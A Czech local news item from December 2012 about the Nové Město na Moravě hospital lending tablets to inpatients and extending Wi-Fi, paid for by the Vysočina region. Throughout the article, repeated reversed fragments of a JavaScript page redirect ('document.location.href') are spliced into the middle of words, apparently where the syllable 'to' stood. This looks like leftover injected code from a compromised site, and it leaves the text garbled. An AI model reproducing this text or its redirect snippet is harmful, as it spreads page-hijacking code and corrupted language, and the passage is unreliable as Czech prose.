Nové Město na Moravě, nove mesto na morave, aktuality, tablety, pacientii
Rainbow page separator

Hospitalizovaní pacienti si budou moci zapůjčit tablety

Neděle, 30. prosince 2012

Nemocnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Malý počítač s dotykovou obrazovkou – tablet – si budou moci už ve druhé polovině ledna zapůjčit pacienti hospitalizovaní v novoměstské nemocnici. V rámci rozšiřování posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaných služeb vyhradil zřizovatel nemocnice – Kraj Vysočina – celkovou částku ve výši 3,5 milionu korun a do všech svých pěti krajských nemocnic nechal pořídit tablety pro pacienty a vybudovat či rozšířit bezdrá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové wi-fi připojení. Do novoměstské nemocnice má tak přibýt patnáct tabletů.

Minimálně v lůžkových částech všech oddělení nemocnice wi-fi připojení funguje už z dřívější doby. Pacientům je přístup k internetu posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tován zdarma, musí mít ale svůj notebook, tablet či jiné podobné komunikační zařízení. Kromě [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho je ve vestibulu hlavního pavilonu ještě umístěn informační interne[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tový kiosek, který využívají nejčastěji ambulantní pacienti, případně i návštěvy, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to například k vyhledávání jízdních řádů.

V rámci rozšíření bezdrá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového připojení by v novoměstské nemocnici kromě lůžkových oddělení a ambulancí měly být pokryty signálem i čekárny a veškeré další pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory.